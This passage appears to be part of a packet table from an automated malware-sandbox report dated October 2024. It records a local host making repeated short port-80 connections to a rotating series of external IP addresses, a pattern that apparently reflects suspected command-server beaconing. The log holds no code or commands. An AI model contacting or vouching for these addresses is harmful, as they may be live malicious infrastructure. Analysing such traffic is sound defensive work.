                                                                                                                              Oct 22, 2024 05:38:36.368979931 CEST4986880192.168.2.6208.91.197.27
                                                                                                                              Oct 22, 2024 05:38:36.369034052 CEST8049868208.91.197.27192.168.2.6
                                                                                                                              Oct 22, 2024 05:38:36.369044065 CEST8049868208.91.197.27192.168.2.6
                                                                                                                              Oct 22, 2024 05:38:36.369082928 CEST4986880192.168.2.6208.91.197.27
                                                                                                                              Oct 22, 2024 05:38:36.421406984 CEST8049868208.91.197.27192.168.2.6
                                                                                                                              Oct 22, 2024 05:38:36.421418905 CEST8049868208.91.197.27192.168.2.6
                                                                                                                              Oct 22, 2024 05:38:36.421533108 CEST4986880192.168.2.6208.91.197.27
                                                                                                                              Oct 22, 2024 05:38:36.429048061 CEST8049868208.91.197.27192.168.2.6
                                                                                                                              Oct 22, 2024 05:38:36.429061890 CEST8049868208.91.197.27192.168.2.6
                                                                                                                              Oct 22, 2024 05:38:36.429071903 CEST8049868208.91.197.27192.168.2.6
                                                                                                                              Oct 22, 2024 05:38:36.429122925 CEST4986880192.168.2.6208.91.197.27
                                                                                                                              Oct 22, 2024 05:38:36.436589003 CEST8049868208.91.197.27192.168.2.6
                                                                                                                              Oct 22, 2024 05:38:36.436602116 CEST8049868208.91.197.27192.168.2.6
                                                                                                                              Oct 22, 2024 05:38:36.436611891 CEST8049868208.91.197.27192.168.2.6
                                                                                                                              Oct 22, 2024 05:38:36.436737061 CEST4986880192.168.2.6208.91.197.27
                                                                                                                              Oct 22, 2024 05:38:36.445074081 CEST8049868208.91.197.27192.168.2.6
                                                                                                                              Oct 22, 2024 05:38:36.445178986 CEST8049868208.91.197.27192.168.2.6
                                                                                                                              Oct 22, 2024 05:38:36.445192099 CEST8049868208.91.197.27192.168.2.6
                                                                                                                              Oct 22, 2024 05:38:36.445240021 CEST4986880192.168.2.6208.91.197.27
                                                                                                                              Oct 22, 2024 05:38:36.486547947 CEST8049868208.91.197.27192.168.2.6
                                                                                                                              Oct 22, 2024 05:38:36.486567974 CEST8049868208.91.197.27192.168.2.6
                                                                                                                              Oct 22, 2024 05:38:36.486578941 CEST8049868208.91.197.27192.168.2.6
                                                                                                                              Oct 22, 2024 05:38:36.486639977 CEST4986880192.168.2.6208.91.197.27
                                                                                                                              Oct 22, 2024 05:38:36.486659050 CEST8049868208.91.197.27192.168.2.6
                                                                                                                              Oct 22, 2024 05:38:36.486715078 CEST4986880192.168.2.6208.91.197.27
                                                                                                                              Oct 22, 2024 05:38:36.486738920 CEST4986880192.168.2.6208.91.197.27
                                                                                                                              Oct 22, 2024 05:38:36.489392042 CEST4986880192.168.2.6208.91.197.27
                                                                                                                              Oct 22, 2024 05:38:36.494877100 CEST8049868208.91.197.27192.168.2.6
                                                                                                                              Oct 22, 2024 05:38:52.126688957 CEST4996280192.168.2.6198.44.251.203
                                                                                                                              Oct 22, 2024 05:38:52.132175922 CEST8049962198.44.251.203192.168.2.6
                                                                                                                              Oct 22, 2024 05:38:52.132374048 CEST4996280192.168.2.6198.44.251.203
                                                                                                                              Oct 22, 2024 05:38:52.140813112 CEST4996280192.168.2.6198.44.251.203
                                                                                                                              Oct 22, 2024 05:38:52.146127939 CEST8049962198.44.251.203192.168.2.6
                                                                                                                              Oct 22, 2024 05:38:53.645212889 CEST4996280192.168.2.6198.44.251.203
                                                                                                                              Oct 22, 2024 05:38:53.691592932 CEST8049962198.44.251.203192.168.2.6
                                                                                                                              Oct 22, 2024 05:38:54.665055037 CEST4997380192.168.2.6198.44.251.203
                                                                                                                              Oct 22, 2024 05:38:54.670562029 CEST8049973198.44.251.203192.168.2.6
                                                                                                                              Oct 22, 2024 05:38:54.670691967 CEST4997380192.168.2.6198.44.251.203
                                                                                                                              Oct 22, 2024 05:38:54.683263063 CEST4997380192.168.2.6198.44.251.203
                                                                                                                              Oct 22, 2024 05:38:54.689270973 CEST8049973198.44.251.203192.168.2.6
                                                                                                                              Oct 22, 2024 05:38:56.192176104 CEST4997380192.168.2.6198.44.251.203
                                                                                                                              Oct 22, 2024 05:38:56.239759922 CEST8049973198.44.251.203192.168.2.6
                                                                                                                              Oct 22, 2024 05:38:57.211994886 CEST4997480192.168.2.6198.44.251.203
                                                                                                                              Oct 22, 2024 05:38:57.217777014 CEST8049974198.44.251.203192.168.2.6
                                                                                                                              Oct 22, 2024 05:38:57.217984915 CEST4997480192.168.2.6198.44.251.203
                                                                                                                              Oct 22, 2024 05:38:57.229672909 CEST4997480192.168.2.6198.44.251.203
                                                                                                                              Oct 22, 2024 05:38:57.235193014 CEST8049974198.44.251.203192.168.2.6
                                                                                                                              Oct 22, 2024 05:38:57.235295057 CEST8049974198.44.251.203192.168.2.6
                                                                                                                              Oct 22, 2024 05:38:58.738914013 CEST4997480192.168.2.6198.44.251.203
                                                                                                                              Oct 22, 2024 05:38:58.787666082 CEST8049974198.44.251.203192.168.2.6
                                                                                                                              Oct 22, 2024 05:38:59.760632038 CEST4997580192.168.2.6198.44.251.203
                                                                                                                              Oct 22, 2024 05:38:59.766148090 CEST8049975198.44.251.203192.168.2.6
                                                                                                                              Oct 22, 2024 05:38:59.766237974 CEST4997580192.168.2.6198.44.251.203
                                                                                                                              Oct 22, 2024 05:38:59.776449919 CEST4997580192.168.2.6198.44.251.203
                                                                                                                              Oct 22, 2024 05:38:59.781830072 CEST8049975198.44.251.203192.168.2.6
                                                                                                                              Oct 22, 2024 05:39:00.625194073 CEST8049962198.44.251.203192.168.2.6
                                                                                                                              Oct 22, 2024 05:39:00.625447989 CEST4996280192.168.2.6198.44.251.203
                                                                                                                              Oct 22, 2024 05:39:03.151165009 CEST8049973198.44.251.203192.168.2.6
                                                                                                                              Oct 22, 2024 05:39:03.151360989 CEST4997380192.168.2.6198.44.251.203
                                                                                                                              Oct 22, 2024 05:39:05.701014042 CEST8049974198.44.251.203192.168.2.6
                                                                                                                              Oct 22, 2024 05:39:05.701092958 CEST4997480192.168.2.6198.44.251.203
                                                                                                                              Oct 22, 2024 05:39:08.254890919 CEST8049975198.44.251.203192.168.2.6
                                                                                                                              Oct 22, 2024 05:39:08.255197048 CEST4997580192.168.2.6198.44.251.203
                                                                                                                              Oct 22, 2024 05:39:08.255809069 CEST4997580192.168.2.6198.44.251.203
                                                                                                                              Oct 22, 2024 05:39:08.261265039 CEST8049975198.44.251.203192.168.2.6
                                                                                                                              Oct 22, 2024 05:39:13.357981920 CEST4997680192.168.2.681.2.196.19
                                                                                                                              Oct 22, 2024 05:39:13.364008904 CEST804997681.2.196.19192.168.2.6
                                                                                                                              Oct 22, 2024 05:39:13.364124060 CEST4997680192.168.2.681.2.196.19
                                                                                                                              Oct 22, 2024 05:39:13.372646093 CEST4997680192.168.2.681.2.196.19
                                                                                                                              Oct 22, 2024 05:39:13.378340006 CEST804997681.2.196.19192.168.2.6
                                                                                                                              Oct 22, 2024 05:39:14.210371971 CEST804997681.2.196.19192.168.2.6
                                                                                                                              Oct 22, 2024 05:39:14.254487038 CEST4997680192.168.2.681.2.196.19
                                                                                                                              Oct 22, 2024 05:39:14.340817928 CEST804997681.2.196.19192.168.2.6
                                                                                                                              Oct 22, 2024 05:39:14.340899944 CEST4997680192.168.2.681.2.196.19
                                                                                                                              Oct 22, 2024 05:39:14.879626036 CEST4997680192.168.2.681.2.196.19
                                                                                                                              Oct 22, 2024 05:39:15.898174047 CEST4997880192.168.2.681.2.196.19
                                                                                                                              Oct 22, 2024 05:39:15.903757095 CEST804997881.2.196.19192.168.2.6
                                                                                                                              Oct 22, 2024 05:39:15.903906107 CEST4997880192.168.2.681.2.196.19
                                                                                                                              Oct 22, 2024 05:39:15.914376020 CEST4997880192.168.2.681.2.196.19
                                                                                                                              Oct 22, 2024 05:39:15.919742107 CEST804997881.2.196.19192.168.2.6
                                                                                                                              Oct 22, 2024 05:39:16.762723923 CEST804997881.2.196.19192.168.2.6
                                                                                                                              Oct 22, 2024 05:39:16.817056894 CEST4997880192.168.2.681.2.196.19
                                                                                                                              Oct 22, 2024 05:39:16.892155886 CEST804997881.2.196.19192.168.2.6
                                                                                                                              Oct 22, 2024 05:39:16.892410994 CEST4997880192.168.2.681.2.196.19
                                                                                                                              Oct 22, 2024 05:39:17.426440001 CEST4997880192.168.2.681.2.196.19
                                                                                                                              Oct 22, 2024 05:39:18.444961071 CEST4997980192.168.2.681.2.196.19
                                                                                                                              Oct 22, 2024 05:39:18.450922012 CEST804997981.2.196.19192.168.2.6
                                                                                                                              Oct 22, 2024 05:39:18.451081991 CEST4997980192.168.2.681.2.196.19
                                                                                                                              Oct 22, 2024 05:39:18.459836960 CEST4997980192.168.2.681.2.196.19
                                                                                                                              Oct 22, 2024 05:39:18.466039896 CEST804997981.2.196.19192.168.2.6
                                                                                                                              Oct 22, 2024 05:39:18.466156006 CEST804997981.2.196.19192.168.2.6
                                                                                                                              Oct 22, 2024 05:39:19.312671900 CEST804997981.2.196.19192.168.2.6
                                                                                                                              Oct 22, 2024 05:39:19.363997936 CEST4997980192.168.2.681.2.196.19
                                                                                                                              Oct 22, 2024 05:39:19.441992998 CEST804997981.2.196.19192.168.2.6
                                                                                                                              Oct 22, 2024 05:39:19.442154884 CEST4997980192.168.2.681.2.196.19
                                                                                                                              Oct 22, 2024 05:39:19.973453045 CEST4997980192.168.2.681.2.196.19
                                                                                                                              Oct 22, 2024 05:39:20.992018938 CEST4998080192.168.2.681.2.196.19
                                                                                                                              Oct 22, 2024 05:39:20.997797966 CEST804998081.2.196.19192.168.2.6
                                                                                                                              Oct 22, 2024 05:39:20.997888088 CEST4998080192.168.2.681.2.196.19
                                                                                                                              Oct 22, 2024 05:39:21.003911972 CEST4998080192.168.2.681.2.196.19
                                                                                                                              Oct 22, 2024 05:39:21.009531021 CEST804998081.2.196.19192.168.2.6
                                                                                                                              Oct 22, 2024 05:39:21.844779015 CEST804998081.2.196.19192.168.2.6
                                                                                                                              Oct 22, 2024 05:39:21.895108938 CEST4998080192.168.2.681.2.196.19
                                                                                                                              Oct 22, 2024 05:39:21.974634886 CEST804998081.2.196.19192.168.2.6
                                                                                                                              Oct 22, 2024 05:39:21.974756956 CEST4998080192.168.2.681.2.196.19
                                                                                                                              Oct 22, 2024 05:39:21.975452900 CEST4998080192.168.2.681.2.196.19
                                                                                                                              Oct 22, 2024 05:39:21.981477976 CEST804998081.2.196.19192.168.2.6
                                                                                                                              Oct 22, 2024 05:39:27.080549955 CEST4998180192.168.2.6195.110.124.133
                                                                                                                              Oct 22, 2024 05:39:27.086245060 CEST8049981195.110.124.133192.168.2.6
                                                                                                                              Oct 22, 2024 05:39:27.086369038 CEST4998180192.168.2.6195.110.124.133
                                                                                                                              Oct 22, 2024 05:39:27.094897032 CEST4998180192.168.2.6195.110.124.133
                                                                                                                              Oct 22, 2024 05:39:27.100534916 CEST8049981195.110.124.133192.168.2.6
                                                                                                                              Oct 22, 2024 05:39:27.920222998 CEST8049981195.110.124.133192.168.2.6
                                                                                                                              Oct 22, 2024 05:39:27.973325968 CEST4998180192.168.2.6195.110.124.133
                                                                                                                              Oct 22, 2024 05:39:28.045315981 CEST8049981195.110.124.133192.168.2.6
                                                                                                                              Oct 22, 2024 05:39:28.045432091 CEST4998180192.168.2.6195.110.124.133
                                                                                                                              Oct 22, 2024 05:39:28.598309994 CEST4998180192.168.2.6195.110.124.133
                                                                                                                              Oct 22, 2024 05:39:29.617207050 CEST4998280192.168.2.6195.110.124.133
                                                                                                                              Oct 22, 2024 05:39:29.622945070 CEST8049982195.110.124.133192.168.2.6
                                                                                                                              Oct 22, 2024 05:39:29.623035908 CEST4998280192.168.2.6195.110.124.133
                                                                                                                              Oct 22, 2024 05:39:29.633151054 CEST4998280192.168.2.6195.110.124.133
                                                                                                                              Oct 22, 2024 05:39:29.639307022 CEST8049982195.110.124.133192.168.2.6
                                                                                                                              Oct 22, 2024 05:39:30.475660086 CEST8049982195.110.124.133192.168.2.6
                                                                                                                              Oct 22, 2024 05:39:30.523236036 CEST4998280192.168.2.6195.110.124.133
                                                                                                                              Oct 22, 2024 05:39:30.599206924 CEST8049982195.110.124.133192.168.2.6
                                                                                                                              Oct 22, 2024 05:39:30.603166103 CEST4998280192.168.2.6195.110.124.133
                                                                                                                              Oct 22, 2024 05:39:31.147289038 CEST4998280192.168.2.6195.110.124.133
                                                                                                                              Oct 22, 2024 05:39:32.163933992 CEST4998380192.168.2.6195.110.124.133
                                                                                                                              Oct 22, 2024 05:39:32.169539928 CEST8049983195.110.124.133192.168.2.6
                                                                                                                              Oct 22, 2024 05:39:32.169615030 CEST4998380192.168.2.6195.110.124.133
                                                                                                                              Oct 22, 2024 05:39:32.179908991 CEST4998380192.168.2.6195.110.124.133
                                                                                                                              Oct 22, 2024 05:39:32.185291052 CEST8049983195.110.124.133192.168.2.6
                                                                                                                              Oct 22, 2024 05:39:32.185394049 CEST8049983195.110.124.133192.168.2.6
                                                                                                                              Oct 22, 2024 05:39:33.014045000 CEST8049983195.110.124.133192.168.2.6
                                                                                                                              Oct 22, 2024 05:39:33.071126938 CEST4998380192.168.2.6195.110.124.133
                                                                                                                              Oct 22, 2024 05:39:33.138883114 CEST8049983195.110.124.133192.168.2.6
                                                                                                                              Oct 22, 2024 05:39:33.142359018 CEST4998380192.168.2.6195.110.124.133
                                                                                                                              Oct 22, 2024 05:39:33.692095995 CEST4998380192.168.2.6195.110.124.133
                                                                                                                              Oct 22, 2024 05:39:34.712376118 CEST4998480192.168.2.6195.110.124.133
                                                                                                                              Oct 22, 2024 05:39:34.718367100 CEST8049984195.110.124.133192.168.2.6
                                                                                                                              Oct 22, 2024 05:39:34.721201897 CEST4998480192.168.2.6195.110.124.133
                                                                                                                              Oct 22, 2024 05:39:34.726413965 CEST4998480192.168.2.6195.110.124.133
                                                                                                                              Oct 22, 2024 05:39:34.732012987 CEST8049984195.110.124.133192.168.2.6
                                                                                                                              Oct 22, 2024 05:39:35.570965052 CEST8049984195.110.124.133192.168.2.6
                                                                                                                              Oct 22, 2024 05:39:35.613850117 CEST4998480192.168.2.6195.110.124.133
                                                                                                                              Oct 22, 2024 05:39:35.695754051 CEST8049984195.110.124.133192.168.2.6
                                                                                                                              Oct 22, 2024 05:39:35.695862055 CEST4998480192.168.2.6195.110.124.133
                                                                                                                              Oct 22, 2024 05:39:35.697475910 CEST4998480192.168.2.6195.110.124.133
                                                                                                                              Oct 22, 2024 05:39:35.702805042 CEST8049984195.110.124.133192.168.2.6
                                                                                                                              Oct 22, 2024 05:39:41.065885067 CEST4998580192.168.2.654.67.87.110
                                                                                                                              Oct 22, 2024 05:39:41.071330070 CEST804998554.67.87.110192.168.2.6
                                                                                                                              Oct 22, 2024 05:39:41.071444035 CEST4998580192.168.2.654.67.87.110
                                                                                                                              Oct 22, 2024 05:39:41.082259893 CEST4998580192.168.2.654.67.87.110
                                                                                                                              Oct 22, 2024 05:39:41.088021040 CEST804998554.67.87.110192.168.2.6
                                                                                                                              Oct 22, 2024 05:39:41.757124901 CEST804998554.67.87.110192.168.2.6
                                                                                                                              Oct 22, 2024 05:39:41.797458887 CEST804998554.67.87.110192.168.2.6
                                                                                                                              Oct 22, 2024 05:39:41.797522068 CEST4998580192.168.2.654.67.87.110
                                                                                                                              Oct 22, 2024 05:39:42.584310055 CEST4998580192.168.2.654.67.87.110
                                                                                                                              Oct 22, 2024 05:39:43.615199089 CEST4998680192.168.2.654.67.87.110
                                                                                                                              Oct 22, 2024 05:39:43.620978117 CEST804998654.67.87.110192.168.2.6
                                                                                                                              Oct 22, 2024 05:39:43.621061087 CEST4998680192.168.2.654.67.87.110
                                                                                                                              Oct 22, 2024 05:39:43.633754969 CEST4998680192.168.2.654.67.87.110
                                                                                                                              Oct 22, 2024 05:39:43.639374018 CEST804998654.67.87.110192.168.2.6
                                                                                                                              Oct 22, 2024 05:39:44.289541960 CEST804998654.67.87.110192.168.2.6
                                                                                                                              Oct 22, 2024 05:39:44.329334974 CEST804998654.67.87.110192.168.2.6
                                                                                                                              Oct 22, 2024 05:39:44.329406977 CEST4998680192.168.2.654.67.87.110
                                                                                                                              Oct 22, 2024 05:39:45.146912098 CEST4998680192.168.2.654.67.87.110
                                                                                                                              Oct 22, 2024 05:39:46.163957119 CEST4998780192.168.2.654.67.87.110
                                                                                                                              Oct 22, 2024 05:39:46.169539928 CEST804998754.67.87.110192.168.2.6
                                                                                                                              Oct 22, 2024 05:39:46.169624090 CEST4998780192.168.2.654.67.87.110
                                                                                                                              Oct 22, 2024 05:39:46.182544947 CEST4998780192.168.2.654.67.87.110
                                                                                                                              Oct 22, 2024 05:39:46.188429117 CEST804998754.67.87.110192.168.2.6
                                                                                                                              Oct 22, 2024 05:39:46.188471079 CEST804998754.67.87.110192.168.2.6
                                                                                                                              Oct 22, 2024 05:39:46.844705105 CEST804998754.67.87.110192.168.2.6
                                                                                                                              Oct 22, 2024 05:39:46.884521961 CEST804998754.67.87.110192.168.2.6
                                                                                                                              Oct 22, 2024 05:39:46.886728048 CEST4998780192.168.2.654.67.87.110
                                                                                                                              Oct 22, 2024 05:39:47.692356110 CEST4998780192.168.2.654.67.87.110
                                                                                                                              Oct 22, 2024 05:39:48.718725920 CEST4998880192.168.2.654.67.87.110
                                                                                                                              Oct 22, 2024 05:39:48.724684000 CEST804998854.67.87.110192.168.2.6
                                                                                                                              Oct 22, 2024 05:39:48.728283882 CEST4998880192.168.2.654.67.87.110
                                                                                                                              Oct 22, 2024 05:39:48.735362053 CEST4998880192.168.2.654.67.87.110
                                                                                                                              Oct 22, 2024 05:39:48.740967989 CEST804998854.67.87.110192.168.2.6
                                                                                                                              Oct 22, 2024 05:39:49.394701004 CEST804998854.67.87.110192.168.2.6
                                                                                                                              Oct 22, 2024 05:39:49.435503960 CEST804998854.67.87.110192.168.2.6
                                                                                                                              Oct 22, 2024 05:39:49.438369036 CEST4998880192.168.2.654.67.87.110
                                                                                                                              Oct 22, 2024 05:39:49.439085007 CEST4998880192.168.2.654.67.87.110
                                                                                                                              Oct 22, 2024 05:39:49.444466114 CEST804998854.67.87.110192.168.2.6
                                                                                                                              Oct 22, 2024 05:39:59.530915022 CEST4998980192.168.2.6199.59.243.227
                                                                                                                              Oct 22, 2024 05:39:59.536444902 CEST8049989199.59.243.227192.168.2.6
                                                                                                                              Oct 22, 2024 05:39:59.536525011 CEST4998980192.168.2.6199.59.243.227
                                                                                                                              Oct 22, 2024 05:39:59.546803951 CEST4998980192.168.2.6199.59.243.227
                                                                                                                              Oct 22, 2024 05:39:59.552433968 CEST8049989199.59.243.227192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:00.196727991 CEST8049989199.59.243.227192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:00.197283030 CEST8049989199.59.243.227192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:00.197345972 CEST4998980192.168.2.6199.59.243.227
                                                                                                                              Oct 22, 2024 05:40:00.229000092 CEST8049989199.59.243.227192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:00.229188919 CEST4998980192.168.2.6199.59.243.227
                                                                                                                              Oct 22, 2024 05:40:01.052196026 CEST4998980192.168.2.6199.59.243.227
                                                                                                                              Oct 22, 2024 05:40:02.069989920 CEST4999080192.168.2.6199.59.243.227
                                                                                                                              Oct 22, 2024 05:40:02.075805902 CEST8049990199.59.243.227192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:02.075891972 CEST4999080192.168.2.6199.59.243.227
                                                                                                                              Oct 22, 2024 05:40:02.088193893 CEST4999080192.168.2.6199.59.243.227
                                                                                                                              Oct 22, 2024 05:40:02.093981028 CEST8049990199.59.243.227192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:02.733761072 CEST8049990199.59.243.227192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:02.733792067 CEST8049990199.59.243.227192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:02.733921051 CEST4999080192.168.2.6199.59.243.227
                                                                                                                              Oct 22, 2024 05:40:02.765773058 CEST8049990199.59.243.227192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:02.765899897 CEST4999080192.168.2.6199.59.243.227
                                                                                                                              Oct 22, 2024 05:40:03.598341942 CEST4999080192.168.2.6199.59.243.227
                                                                                                                              Oct 22, 2024 05:40:04.619545937 CEST4999180192.168.2.6199.59.243.227
                                                                                                                              Oct 22, 2024 05:40:04.625293970 CEST8049991199.59.243.227192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:04.628290892 CEST4999180192.168.2.6199.59.243.227
                                                                                                                              Oct 22, 2024 05:40:04.640197992 CEST4999180192.168.2.6199.59.243.227
                                                                                                                              Oct 22, 2024 05:40:04.645600080 CEST8049991199.59.243.227192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:04.645626068 CEST8049991199.59.243.227192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:05.254085064 CEST8049991199.59.243.227192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:05.254111052 CEST8049991199.59.243.227192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:05.254189014 CEST8049991199.59.243.227192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:05.254324913 CEST4999180192.168.2.6199.59.243.227
                                                                                                                              Oct 22, 2024 05:40:06.145262003 CEST4999180192.168.2.6199.59.243.227
                                                                                                                              Oct 22, 2024 05:40:07.164208889 CEST4999280192.168.2.6199.59.243.227
                                                                                                                              Oct 22, 2024 05:40:07.169810057 CEST8049992199.59.243.227192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:07.172386885 CEST4999280192.168.2.6199.59.243.227
                                                                                                                              Oct 22, 2024 05:40:07.178186893 CEST4999280192.168.2.6199.59.243.227
                                                                                                                              Oct 22, 2024 05:40:07.183804035 CEST8049992199.59.243.227192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:07.806710958 CEST8049992199.59.243.227192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:07.806770086 CEST8049992199.59.243.227192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:07.806885004 CEST4999280192.168.2.6199.59.243.227
                                                                                                                              Oct 22, 2024 05:40:07.807046890 CEST8049992199.59.243.227192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:07.807101965 CEST4999280192.168.2.6199.59.243.227
                                                                                                                              Oct 22, 2024 05:40:07.810399055 CEST4999280192.168.2.6199.59.243.227
                                                                                                                              Oct 22, 2024 05:40:07.815809011 CEST8049992199.59.243.227192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:12.836519957 CEST4999380192.168.2.6162.213.249.216
                                                                                                                              Oct 22, 2024 05:40:12.842003107 CEST8049993162.213.249.216192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:12.842092991 CEST4999380192.168.2.6162.213.249.216
                                                                                                                              Oct 22, 2024 05:40:12.850466967 CEST4999380192.168.2.6162.213.249.216
                                                                                                                              Oct 22, 2024 05:40:12.855803967 CEST8049993162.213.249.216192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:13.554639101 CEST8049993162.213.249.216192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:13.596024990 CEST8049993162.213.249.216192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:13.596082926 CEST4999380192.168.2.6162.213.249.216
                                                                                                                              Oct 22, 2024 05:40:14.364065886 CEST4999380192.168.2.6162.213.249.216
                                                                                                                              Oct 22, 2024 05:40:15.383588076 CEST4999480192.168.2.6162.213.249.216
                                                                                                                              Oct 22, 2024 05:40:15.389295101 CEST8049994162.213.249.216192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:15.396198988 CEST4999480192.168.2.6162.213.249.216
                                                                                                                              Oct 22, 2024 05:40:15.404201984 CEST4999480192.168.2.6162.213.249.216
                                                                                                                              Oct 22, 2024 05:40:15.409624100 CEST8049994162.213.249.216192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:16.082892895 CEST8049994162.213.249.216192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:16.121392012 CEST8049994162.213.249.216192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:16.121449947 CEST4999480192.168.2.6162.213.249.216
                                                                                                                              Oct 22, 2024 05:40:16.910828114 CEST4999480192.168.2.6162.213.249.216
                                                                                                                              Oct 22, 2024 05:40:17.940768003 CEST4999580192.168.2.6162.213.249.216
                                                                                                                              Oct 22, 2024 05:40:17.946280003 CEST8049995162.213.249.216192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:17.946345091 CEST4999580192.168.2.6162.213.249.216
                                                                                                                              Oct 22, 2024 05:40:17.958930016 CEST4999580192.168.2.6162.213.249.216
                                                                                                                              Oct 22, 2024 05:40:17.964216948 CEST8049995162.213.249.216192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:17.964483976 CEST8049995162.213.249.216192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:18.649277925 CEST8049995162.213.249.216192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:18.687393904 CEST8049995162.213.249.216192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:18.692223072 CEST4999580192.168.2.6162.213.249.216
                                                                                                                              Oct 22, 2024 05:40:19.474212885 CEST4999580192.168.2.6162.213.249.216
                                                                                                                              Oct 22, 2024 05:40:20.491976976 CEST4999680192.168.2.6162.213.249.216
                                                                                                                              Oct 22, 2024 05:40:20.497559071 CEST8049996162.213.249.216192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:20.497658968 CEST4999680192.168.2.6162.213.249.216
                                                                                                                              Oct 22, 2024 05:40:20.504648924 CEST4999680192.168.2.6162.213.249.216
                                                                                                                              Oct 22, 2024 05:40:20.510031939 CEST8049996162.213.249.216192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:21.178417921 CEST8049996162.213.249.216192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:21.217744112 CEST8049996162.213.249.216192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:21.217859030 CEST4999680192.168.2.6162.213.249.216
                                                                                                                              Oct 22, 2024 05:40:21.218801022 CEST4999680192.168.2.6162.213.249.216
                                                                                                                              Oct 22, 2024 05:40:21.226044893 CEST8049996162.213.249.216192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:27.523672104 CEST4999780192.168.2.6221.121.144.149
                                                                                                                              Oct 22, 2024 05:40:27.529295921 CEST8049997221.121.144.149192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:27.529349089 CEST4999780192.168.2.6221.121.144.149
                                                                                                                              Oct 22, 2024 05:40:27.542023897 CEST4999780192.168.2.6221.121.144.149
                                                                                                                              Oct 22, 2024 05:40:27.547564983 CEST8049997221.121.144.149192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:29.051482916 CEST4999780192.168.2.6221.121.144.149
                                                                                                                              Oct 22, 2024 05:40:29.057749987 CEST8049997221.121.144.149192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:29.058163881 CEST4999780192.168.2.6221.121.144.149
                                                                                                                              Oct 22, 2024 05:40:30.108992100 CEST4999880192.168.2.6221.121.144.149
                                                                                                                              Oct 22, 2024 05:40:30.115365982 CEST8049998221.121.144.149192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:30.115447998 CEST4999880192.168.2.6221.121.144.149
                                                                                                                              Oct 22, 2024 05:40:30.132349014 CEST4999880192.168.2.6221.121.144.149
                                                                                                                              Oct 22, 2024 05:40:30.137624979 CEST8049998221.121.144.149192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:31.645312071 CEST4999880192.168.2.6221.121.144.149
                                                                                                                              Oct 22, 2024 05:40:31.654077053 CEST8049998221.121.144.149192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:31.654159069 CEST4999880192.168.2.6221.121.144.149
                                                                                                                              Oct 22, 2024 05:40:32.666014910 CEST4999980192.168.2.6221.121.144.149
                                                                                                                              Oct 22, 2024 05:40:32.672878981 CEST8049999221.121.144.149192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:32.676531076 CEST4999980192.168.2.6221.121.144.149
                                                                                                                              Oct 22, 2024 05:40:32.685199022 CEST4999980192.168.2.6221.121.144.149
                                                                                                                              Oct 22, 2024 05:40:32.690726995 CEST8049999221.121.144.149192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:32.690758944 CEST8049999221.121.144.149192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:34.192089081 CEST4999980192.168.2.6221.121.144.149
                                                                                                                              Oct 22, 2024 05:40:34.198724985 CEST8049999221.121.144.149192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:34.198786020 CEST4999980192.168.2.6221.121.144.149
                                                                                                                              Oct 22, 2024 05:40:35.211714029 CEST5000080192.168.2.6221.121.144.149
                                                                                                                              Oct 22, 2024 05:40:35.217286110 CEST8050000221.121.144.149192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:35.223412991 CEST5000080192.168.2.6221.121.144.149
                                                                                                                              Oct 22, 2024 05:40:35.228218079 CEST5000080192.168.2.6221.121.144.149
                                                                                                                              Oct 22, 2024 05:40:35.233623028 CEST8050000221.121.144.149192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:36.621258974 CEST8050000221.121.144.149192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:36.679327011 CEST5000080192.168.2.6221.121.144.149
                                                                                                                              Oct 22, 2024 05:40:36.813617945 CEST8050000221.121.144.149192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:36.814368963 CEST5000080192.168.2.6221.121.144.149
                                                                                                                              Oct 22, 2024 05:40:36.815361023 CEST5000080192.168.2.6221.121.144.149
                                                                                                                              Oct 22, 2024 05:40:36.820692062 CEST8050000221.121.144.149192.168.2.6
                                                                                                                              Oct 22, 2024 05:40:41.891699076 CEST5000180192.168.2.6199.59.243.227
